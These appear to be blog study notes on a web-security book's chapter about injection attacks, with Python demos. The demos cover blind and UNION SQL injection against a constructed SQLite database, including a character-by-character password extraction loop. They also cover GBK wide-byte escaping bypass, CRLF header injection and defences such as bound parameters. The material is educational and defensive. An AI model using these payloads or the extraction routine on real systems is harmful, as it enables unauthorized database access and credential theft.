"White Hat Talks Web Security" | study notes: injection attacks

Chapter 7: Injection attacks

The essence of an injection attack is that data entered by the user ends up being executed as code. Two conditions must hold: first, the user is able to control the input; second, the program's original code is executed with the user-supplied data concatenated into it.

1. SQL injection

SQL injection inserts SQL commands into a submitted web form, an input field of a domain name or page request, or a query string, so that the server is tricked into executing malicious SQL. It is a relatively common attack against databases. If the site's web server is configured to echo errors back to the client, the verbose error messages leak sensitive information (such as the failing query fragment), which makes it much easier for an attacker to construct the injection.
2. Blind injection (Blind Injection)

A blind injection is carried out when the server does not echo errors. Without error output the attacker is missing a very important piece of "debugging information", so they must find another way to verify that the injected SQL statement was executed.

The most common verification method is to construct a simple conditional statement and decide whether the SQL executed from whether the returned page changes.

For example, with id=2 and 1=2 the attacker sees a blank or error page. When id=2 and 1=1 is entered instead and the page comes back normally, this shows that the injected SQL statement executed and that the id parameter is injectable.

3. Timing Attack

MySQL's BENCHMARK() function executes the same expression a given number of times, so that the query takes noticeably longer than usual; from the change in response time the attacker can tell whether the injected statement was executed. This is a side-channel attack, and a blind injection performed this way is called a Timing Attack. Other databases have functions similar to BENCHMARK() that can be used for a Timing Attack in the same way.

4. Database attack techniques

SQL injection can also be used to guess the database version. The following payload returns TRUE if the MySQL major version is 4:

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4

The following payloads use UNION SELECT to confirm, first, that the table admin exists and, second, that its column passwd exists:

id=5 union all select 1,2,3 from admin

id=5 union all select 1,2,passwd from admin
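The boolean check from section 2 and the fingerprint and UNION probes above, carried out against a small database. This is an added example, not code from the original page or from the book: it uses an in-memory SQLite database with constructed contents in place of the MySQL site, a hypothetical news.php-style handler, and SQLite's sqlite_version(), substr() and unicode() where the page's MySQL payloads use @@version and substring(). The blind extraction routine generalizes the page's single and 1=1 / and 1=2 test into character-by-character recovery by binary search.

```python
import sqlite3

# Constructed demo database: the news table the application queries and the
# admin table the attacker wants to read.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news(id INTEGER, title TEXT, body TEXT);
        INSERT INTO news VALUES (5, 'Hello', 'first post');
        CREATE TABLE admin(id INTEGER, name TEXT, passwd TEXT);
        INSERT INTO admin VALUES (1, 'root', 's3cret');
    """)
    return conn

def vulnerable_page(conn: sqlite3.Connection, id_param: str) -> list:
    """Hypothetical news.php?id=<id_param>: the raw parameter is concatenated
    into the query. A SQL error is modelled as an empty result, i.e. the
    'error page' of a server that does not echo errors."""
    sql = "SELECT id, title, body FROM news WHERE id = " + id_param
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error:
        return []

def page_ok(conn: sqlite3.Connection, id_param: str) -> bool:
    """Blind oracle: did the page come back 'normal' (at least one row)?"""
    return len(vulnerable_page(conn, id_param)) > 0

def is_injectable(conn: sqlite3.Connection) -> bool:
    """The page's id=5 and 1=1 / id=5 and 1=2 check."""
    return page_ok(conn, "5 and 1=1") and not page_ok(conn, "5 and 1=2")

def major_version_is(conn: sqlite3.Connection, digit: str) -> bool:
    """Version fingerprint, cf. substring(@@version,1,1)=4 on MySQL."""
    return page_ok(conn, f"5 and substr(sqlite_version(),1,1)='{digit}'")

def table_exists(conn: sqlite3.Connection, table: str) -> bool:
    """id=5 union all select 1,2,3 from <table>: a second, injected row
    appears only if the table exists; otherwise the query errors out."""
    return len(vulnerable_page(conn, f"5 union all select 1,2,3 from {table}")) > 1

def union_extract(conn: sqlite3.Connection, table: str, column: str) -> list:
    """id=5 union all select 1,2,<column> from <table>: the column value is
    rendered where the news body would be; [] if the column does not exist."""
    rows = vulnerable_page(conn, f"5 union all select 1,2,{column} from {table}")
    return [row[2] for row in rows[1:]]

def blind_extract(conn: sqlite3.Connection, subquery: str, max_len: int = 64) -> str:
    """Boolean-based blind extraction of a scalar subquery, one character at a
    time by binary search on its code point (printable ASCII assumed).
    A Timing Attack would run the same loop with elapsed time as the oracle."""
    result = ""
    for pos in range(1, max_len + 1):
        if not page_ok(conn, f"5 and length(({subquery})) >= {pos}"):
            break
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if page_ok(conn, f"5 and unicode(substr(({subquery}),{pos},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result

if __name__ == "__main__":
    conn = make_db()
    print("injectable :", is_injectable(conn))
    print("SQLite 3.x :", major_version_is(conn, "3"))
    print("admin table:", table_exists(conn, "admin"), "| users table:", table_exists(conn, "users"))
    print("union      :", union_extract(conn, "admin", "passwd"))
    print("blind      :", blind_extract(conn, "select passwd from admin"))
```

Each blind character costs about seven requests here; sqlmap automates exactly this loop, including the timing variant, against real database back ends.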

sqlmap.py is a very good automated injection tool.

5. Command execution

In MySQL, besides executing commands indirectly by exporting a webshell, the "user-defined function" technique, i.e. UDF (User-Defined Function), can also be used to execute commands.

6. Stored procedure attacks

Stored procedures must be executed with CALL or EXECUTE.

xp_cmdshell: executes system commands (enabled by default in SQL Server 2000; disabled by default in 2005 and later).

xp_regread: reads the registry.

xp_servicecontrol: allows the user to start and stop services.

xp_dirtree: allows a directory tree to be obtained.

xp_loginconfig: obtains the server's security configuration.

Stored procedures themselves may also contain injection vulnerabilities.

7. Encoding problems

When the database uses a "wide character" (multi-byte) character set, unexpected vulnerabilities can appear. For example, when MySQL uses the GBK encoding, the byte pair 0xbf5c is treated as a single double-byte character. If the application escapes the quote in the input 0xbf27 by inserting a backslash (0x5c) in front of it, the result 0xbf5c27 is read as the character 0xbf5c followed by an unescaped quote 0x27, and the escaping is defeated.

The best practice is to standardize the database character set on UTF-8.
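The wide-byte problem reproduced in pure Python, as an added example that is not code from the original page or from the book. The byte-oriented escaping routine, the query builders and the attacker payload are all constructed for the demonstration; the point is the order of operations: escaping raw bytes and then letting the database decode them as GBK swallows the backslash into a double-byte character, while decoding strictly first and escaping at the character level either rejects the malformed input or escapes the quote correctly.

```python
# Charset-unaware escaping in the style of PHP's addslashes(): put a
# backslash (0x5c) in front of every ' " and \ byte, byte by byte.
def addslashes_bytes(raw: bytes) -> bytes:
    out = bytearray()
    for b in raw:
        if b in (0x27, 0x22, 0x5c):
            out.append(0x5c)
        out.append(b)
    return bytes(out)

def query_escape_then_decode(raw_name: bytes, charset: str = "gbk") -> str:
    """Vulnerable order: escape the raw bytes, then let the database read the
    result as GBK. For 0xbf 0x27 this yields 0xbf 0x5c 0x27, and 0xbf5c is
    consumed as one double-byte character, leaving 0x27 as a live quote."""
    escaped = addslashes_bytes(raw_name).decode(charset)
    return "SELECT * FROM users WHERE name = '" + escaped + "'"

def query_decode_then_escape(raw_name: bytes, charset: str = "gbk"):
    """Correct order: decode strictly first (an invalid sequence such as
    0xbf 0x27 raises and the request is rejected, returning None), then
    escape at the character level so no multi-byte pair can absorb the
    backslash. Bound parameters would avoid the escaping entirely."""
    try:
        name = raw_name.decode(charset)
    except UnicodeDecodeError:
        return None
    escaped = name.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')
    return "SELECT * FROM users WHERE name = '" + escaped + "'"

# Constructed attacker input, the decoded form of %bf%27 OR 1=1 -- in a URL.
PAYLOAD = b"\xbf' OR 1=1 -- "

if __name__ == "__main__":
    print(query_escape_then_decode(PAYLOAD))                 # quote survives, no backslash left
    print(query_decode_then_escape(PAYLOAD))                 # None: rejected as invalid GBK
    print(query_decode_then_escape("中文'".encode("gbk")))   # valid input is escaped normally
```

The same construction applies to any charset whose trail bytes may be 0x5c; unifying on UTF-8, where 0x5c can only ever be a standalone backslash, removes the problem at the root.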

8. Correctly defending against SQL injection

  1. Find all SQL injection vulnerabilities;
  2. Repair these vulnerabilities.

In general, the best way to defend against SQL injection is to use prepared statements with bound variables.

Use stored procedures: the SQL statements are defined inside the database, and dynamic SQL inside a stored procedure should be avoided as far as possible. If it cannot be avoided, strictly filter the input or process the user-supplied data with an encoding function.

Check the data type.

Use safe functions (such as encoding functions) when handling user input.
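The two main recommendations above, bound variables and a data-type check, beside the concatenation they replace. This is an added example, not code from the original page or from the book: the handlers mirror the page's news.php?id=5 URL, the SQLite database and its contents are constructed, and the search-by-title handler is added to show that binding also neutralizes quotes in string values.

```python
import sqlite3

# Constructed demo database with the table the attacker wants to reach.
conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE news(id INTEGER, title TEXT);
    INSERT INTO news VALUES (5, 'Hello');
    CREATE TABLE admin(id INTEGER, passwd TEXT);
    INSERT INTO admin VALUES (1, 's3cret');
""")

def get_news_unsafe(id_param: str) -> list:
    """String concatenation: the parameter becomes part of the SQL code."""
    return conn.execute("SELECT id, title FROM news WHERE id = " + id_param).fetchall()

def search_unsafe(title: str) -> list:
    """The same mistake with a quoted string value."""
    return conn.execute("SELECT id, title FROM news WHERE title = '" + title + "'").fetchall()

def get_news_safe(id_param: str) -> list:
    """1. Check the data type: an id must be an integer; anything else is
       rejected before any SQL is built.
    2. Prepared statement: the value is bound to the ? placeholder and is
       never interpreted as SQL text."""
    try:
        news_id = int(id_param)
    except ValueError:
        return []
    return conn.execute("SELECT id, title FROM news WHERE id = ?", (news_id,)).fetchall()

def search_safe(title: str) -> list:
    """Bound string variable: quotes inside the value have no syntactic meaning."""
    return conn.execute("SELECT id, title FROM news WHERE title = ?", (title,)).fetchall()

if __name__ == "__main__":
    union = "5 union all select 1, passwd from admin"
    print("unsafe id :", get_news_unsafe(union))    # the admin password appears as a news row
    print("safe id   :", get_news_safe(union))      # rejected by the integer check
    tautology = "' OR 1=1 --"
    print("unsafe str:", search_unsafe(tautology))  # every row matches
    print("safe str  :", search_safe(tautology))    # no title equals the literal payload
```

The type check alone would stop the integer case, and binding alone would stop both; doing both keeps the code correct even if a later change turns the id into a string column.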

9. Other injection attacks

XML injection: XML injection is carried out by rewriting the content of the XML data.

Code injection: often caused by unsafe methods or functions, such as eval(), dynamic include() in PHP and JSP, and system().

CRLF injection: carriage return (CR, ASCII 13, \r) and line feed (LF, ASCII 10, \n).

The two characters \r\n form one newline; their hexadecimal encodings are 0x0d and 0x0a.

The defense against CRLF injection is very simple: handle the two characters "\r" and "\n" correctly (filter or encode them) wherever user input is written into a line-oriented context.
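CRLF injection into an HTTP response header, with the fix described above. This is an added example, not code from the original page or from the book: the redirect handler, the tiny header parser and the attacker input are constructed; real HTTP libraries should be relied on to reject CR and LF, and this shows what they are protecting against.

```python
CRLF = "\r\n"   # 0x0d 0x0a: the line terminator of HTTP headers

class HeaderInjection(ValueError):
    """Raised when a header value would terminate the current header line."""

def build_redirect_unsafe(location: str) -> str:
    """Hypothetical redirect handler that copies a user-controlled URL into
    the Location header unchanged."""
    return "HTTP/1.1 302 Found" + CRLF + "Location: " + location + CRLF + CRLF

def check_header_value(value: str) -> str:
    """Reject \r and \n. Stripping them (value.replace) is the other common
    fix; rejecting keeps the attempt visible instead of silently mangling it."""
    if "\r" in value or "\n" in value:
        raise HeaderInjection("CR or LF in header value")
    return value

def build_redirect_safe(location: str) -> str:
    return "HTTP/1.1 302 Found" + CRLF + "Location: " + check_header_value(location) + CRLF + CRLF

def parse_headers(raw: str) -> dict:
    """Minimal parser showing what a browser or proxy extracts from the bytes."""
    head, _, _body = raw.partition(CRLF + CRLF)
    headers = {}
    for line in head.split(CRLF)[1:]:       # skip the status line
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return headers

def is_rejected(location: str) -> bool:
    """True if the hardened handler refuses this value."""
    try:
        build_redirect_safe(location)
    except HeaderInjection:
        return True
    return False

# Constructed attacker input; on the wire it would arrive as /home%0d%0aSet-Cookie:...
PAYLOAD = "/home\r\nSet-Cookie: session=attacker"

if __name__ == "__main__":
    print(parse_headers(build_redirect_unsafe(PAYLOAD)))   # attacker-chosen Set-Cookie appears
    print("rejected:", is_rejected(PAYLOAD))               # hardened handler refuses it
```

The same check belongs anywhere a value is written into a line-delimited format: log lines, SMTP headers and e-mail bodies have the same failure mode.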

10. Summary

Injection attacks are the result of the application violating the principle of "separation of data and code".

In defending against injection attacks, keep the "principle of separation of data and code" in mind and place the security check at the point where data is concatenated into code; this is enough to avoid this class of problem.


Source: blog.csdn.net/qq_42646885/article/details/95314190